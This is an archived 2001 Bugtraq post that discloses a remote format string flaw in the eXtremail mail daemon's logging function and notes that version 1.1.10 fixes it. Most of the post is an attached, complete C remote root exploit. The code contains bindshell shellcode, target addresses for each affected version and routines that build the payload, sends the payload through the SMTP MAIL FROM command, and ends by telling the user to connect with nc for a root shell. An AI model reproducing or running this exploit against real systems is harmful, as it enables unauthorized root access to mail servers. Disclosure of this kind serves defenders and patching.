[21140] in bugtraq
eXtremail Remote Format String ('s)
daemon@ATHENA.MIT.EDU (mu-b)
Fri Jun 22 13:21:04 2001
Message-ID: <004d01c0fb09$ce9ce4c0$8119fea9@neilk>
From: "mu-b" <mu-b@digit-labs.org>
To: <bugtraq@securityfocus.com>
Date: Fri, 22 Jun 2001 11:55:09 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_004A_01C0FB12.2F9941D0"
------=_NextPart_000_004A_01C0FB12.2F9941D0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Bugtraq readers,
eXtremail is a free integrated pop3/smtpd mail daemon for Linux (x86), although
it is free it is closed sourced software. It has been found that the majority of the
newer versions are vulnerable to a remotely exploitable format string condition.
The following versions are confirmed to be vulnerable to this condition:
eXtremail v1.1.5
eXtremail v1.1.6
eXtremail v1.1.7
eXtremail v1.1.8
eXtremail v1.1.9
Note: Version 1.1.3 is also presumed to be vulnerable but that version was not
available for testing, although I have strong reason to assume that it is.
The format string problem is located in the flog() function, and is caused by the
use of user defined data as the format string for an fprintf() statement. This problem
can be exploited remotely to yield remote root privileges, through sending
appropriately constructed strings as the arguments to the following commands:
Smtpd - HELO / EHLO / MAIL FROM:<....@....> / RCPT TO:<....@....>
Pop3 - USER (+ others requiring a suitable login).
This issue has been patched as of version 1.1.10, it is advisable that current or
prospective users download this version as soon as possible. This is obtainable
from the eXtremail homepage found at http://www.extremail.com
Exploit code attached....
Yours Sincerly.....
mu-b
___________________________________________________________
mu-b (µb) (mu-b@digit-labs.org)
http://www.digit-labs.org
"Like German Tourists, the stupid are everywhere"
-Arnold 'Judas' Rimmer - Red Dwarf BBC (c)
------=_NextPart_000_004A_01C0FB12.2F9941D0
Content-Type: application/octet-stream;
name="extremail-exp.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="extremail-exp.c"
/* eXtremail-exp.c
*
* - eXtremail v1.1.5-9 Remote Root Exploit (x86) -
*
* - Tested on: RedHat 7.0 eXtremail v1.1.5
* RedHat 7.0 eXtremail v1.1.6
* RedHat 7.0 eXtremail v1.1.7
* RedHat 7.0 eXtremail v1.1.8
* RedHat 7.0 eXtremail v1.1.9
* NOT VULNERABLE eXtremail v1.1.10
*
* Copyright (c) 2001 by <mu-b@digit-labs.org>
*
* eXtremail v1.1.5+ has a format string problem
* in flog(). This problem affects all user commands
* (helo/ehlo/mail from:/rcpt to:), and is caused
* by an improper fprintf() to the servers logfile.
*
* Buffers for helo/ehlo are too small (except v1.1.5),
* therefore we use mail from: instead :).=20
*
* Note: Return Address's are quite tight due to the small
* buffers. Returning to the Heap is possible but
* is VERY unstable.
*
* Greets: mjm, all@alldas.de, teleh0r, grazer, cmds, gollum, =
#!digit-labs
*
* http://www.digit-labs.org/ -- Digit-Labs 2001!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <resolv.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/stat.h>
#define NOP 0x41
#define NUMVULN 4
#define OFFSET 0
#define PORT 25
void banner();
void mkfmt();
int opensocket(char *);
void usage();
char buf[520];
int buflength, type =3D 0, sock;
unsigned long target, retaddr;
unsigned char shellcode[]=3D /* lamagra bindshell code */
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";
/* target address's -> objdump -R smtpd | grep "fflush" */
struct {
char *name;
unsigned long target;
unsigned long retaddr;
int padding;
int buflength;
} targets[] =3D {
{ "RedHat 7.0 eXtremail v1.1R5", 0x080864e0, 0xbf1ff64a, 1, =
500},
{ "RedHat 7.0 eXtremail v1.1R6", 0x08089d5c, 0xbf1ff5d6, 1, =
266},
{ "RedHat 7.0 eXtremail v1.1R7", 0x0808b3fc, 0xbf1ff5d6, 1, =
266},
{ "RedHat 7.0 eXtremail v1.1R8", 0x0808b6fc, 0xbf1ff5d6, 1, =
266},
{ "RedHat 7.0 eXtremail v1.1R9", 0x08088890, 0xbf1ff5d6, 1, =
266},
{ 0 } };
void banner()
{
fprintf(stderr, "\neXtremail V1.1R5-9 remote root exploit\n");
fprintf(stderr, "by: <mu-b@digit-labs.org>\n");
fprintf(stderr, "Copyright (c) 2001 Digit-Labs!@#$!\n");
fprintf(stderr, "http://www.digit-labs.org\n\n");
}
void mkfmt()
{
int i, j =3D 0, num;
int bytesofar;
int fmtints[4];
char *bufptr;
unsigned char temp[4];
bytesofar =3D 35 + targets[type].padding;
bufptr =3D &buf[strlen(buf)];
temp[0] =3D (unsigned char) (target & 0x000000ff);
temp[1] =3D (unsigned char)((target & 0x0000ff00) >> 8);
temp[2] =3D (unsigned char)((target & 0x00ff0000) >> 16);
temp[3] =3D (unsigned char)((target & 0xff000000) >> 24);
for(i =3D 0; i < 4; i++)
{
sprintf(bufptr, "%c%c%c%c", temp[0], temp[1], temp[2], temp[3]);
bufptr +=3D 4;
temp[0]++;
}
fmtints[0] =3D (int) (retaddr & 0x000000ff);
fmtints[1] =3D (int)((retaddr & 0x0000ff00) >> 8);
fmtints[2] =3D (int)((retaddr & 0x00ff0000) >> 16);
fmtints[3] =3D (int)((retaddr & 0xff000000) >> 24);
=20
for(i =3D 0; i < 4; i++)
{
num =3D 0;
if(fmtints[i] - bytesofar < 10)
{
while(num !=3D 1)
{
fmtints[i] =3D (fmtints[i] + 0x100);
if(fmtints[i] - bytesofar > 9)
{
fmtints[i] -=3D bytesofar;
bytesofar +=3D fmtints[i];
num =3D 1;
}
}
}
else
{
fmtints[i] -=3D bytesofar;
bytesofar +=3D fmtints[i];
}
}
sprintf(bufptr, "%%.%du%%38$n%%.%du%%39$n%%.%du%%40$n%%.%du%%41$n", =
fmtints[0], fmtints[1], fmtints[2], fmtints[3]);
for(i =3D strlen(buf); i < buflength - strlen(shellcode) - 1; i++)
buf[i] =3D NOP;
for(i =3D i; i < buflength - 1; i++)
{
buf[i] =3D shellcode[j];
j++;
}
buf[buflength - 1] =3D '\n';
buf[buflength] =3D '\0';
write(sock, buf, strlen(buf));
}
int opensocket(char *host)
{
int s;
struct sockaddr_in remote_sin;
struct hostent *he;
if((s =3D socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) =3D=3D -1) {
perror("socket()");
return -1;
}
memset((char *)&remote_sin, 0, sizeof(remote_sin));
if((he =3D gethostbyname(host)) !=3D NULL)
memcpy((char *)&remote_sin.sin_addr, he->h_addr, he->h_length);
else if((remote_sin.sin_addr.s_addr =3D inet_addr(host)) < 0) {
perror("gethostbyname()/inet_addr()");
return -1;
}
remote_sin.sin_family =3D PF_INET;
remote_sin.sin_port =3D htons(PORT);
if(connect(s, (struct sockaddr *)&remote_sin, sizeof(remote_sin)) =
=3D=3D -1) {
perror("connect()");
close(s);
return -1;
}
=20
return s;
}
void usage()
{
int i;
fprintf(stderr, "Usage: ./extremail <host> [type]\n");
fprintf(stderr, "\nTargets:\n");
for (i =3D 0; targets[i].name; i++)
fprintf(stderr, "\t%d.\t%s\n", i, targets[i].name);
fprintf(stderr, "\n");=09
exit(0);
}
int main (int argc, char *argv[])
{
char *host;
int i;
banner();
if(argc < 2)
usage();
=20
if(argc >=3D 3)
type =3D atoi(argv[2]);
if(type > NUMVULN)
type =3D 0;
=20
host =3D argv[1];
buflength =3D targets[type].buflength;
target =3D targets[type].target;
retaddr =3D targets[type].retaddr + OFFSET;
fprintf(stderr, "Target:\t\t%s\nType:\t\t%s\n", host, =
targets[type].name);
fprintf(stderr, "Target Address:\t%p\nReturn =
Address:\t%p\nOffset:\t\t%d\n", target, retaddr, OFFSET);
fprintf(stderr, "Buflength:\t%d\n", buflength); =20
if ((sock =3D opensocket(host)) <=3D 0)
return -1;
fprintf(stderr, "\nConnected....\n");
memcpy(buf, "MAIL FROM:<", 11);
=20
for(i =3D 0; i < targets[type].padding; i++)
buf[strlen(buf)] =3D 0x61;
sleep(1);
write(sock, "HELO digit-labs.org!@#$!\n", 26);
sleep(1);
mkfmt();
sleep(1);
close(sock);
fprintf(stderr, "\n[1] sent payload....\n");
fprintf(stderr, "[2] waiting....\n");
sleep(2);
fprintf(stderr, "[3] nc %s 36864 for shell....\n\n", host);
return;
}
------=_NextPart_000_004A_01C0FB12.2F9941D0--
